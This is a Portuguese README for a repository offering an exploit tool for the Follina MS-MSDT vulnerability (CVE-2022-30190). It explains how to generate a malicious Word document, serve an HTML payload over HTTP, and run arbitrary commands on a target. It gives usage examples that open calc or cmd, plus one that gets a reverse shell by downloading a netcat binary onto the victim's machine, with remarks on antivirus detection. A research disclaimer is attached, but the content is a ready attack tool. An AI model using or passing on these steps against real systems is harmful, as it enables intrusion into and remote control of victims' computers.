
Implementação do FOLLINA-CVE-2022-30190
Implementação do FOLLINA-CVE-2022-30190
Este repositório contém uma ferramenta de exploração para a vulnerabilidade FOLLINA-CVE-2022-30190
Esta ferramenta foi desenvolvida para fins de teste de segurança e pesquisa. Ao clonar/forkar esta ferramenta, o desenvolvedor original isenta-se de qualquer responsabilidade sobre as ações dos atores.
Crie um ataque "Follina" MS-MSDT com um documento malicioso do Microsoft Word e hospede uma payload com um servidor HTTP.
uso: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
opções:
-h, --help mostra esta mensagem de ajuda e sai
--command COMMAND
comando a ser executado no alvo (padrão: calc)
--output OUTPUT
arquivo maldoc de saída (padrão: ./follina.doc)
--interface INTERFACE
interface de rede ou endereço IP para hospedar o servidor HTTP (padrão: eth0)
--port PORT
porta para servir o servidor HTTP (padrão: 8000)
Abra o calc.exe:
$ python3 exploit.py
[+] copiando documento temporário /tmp/9mcvbrwo
[+] criado maldoc ./cve202230190.doc
[+] servindo payload HTML em :8000
Abra o cmd.exe:
$ python3 exploit.py --command "cmd"
Obtenha uma reverse shell na porta 9001. Nota: isso baixa um binário netcat na vítima e o coloca em C:\Windows\Tasks.
Ele não limpa o binário. Isso acionará detecções de antivírus a menos que o AV esteja desabilitado.
$ python3 exploit.py --reverse 9001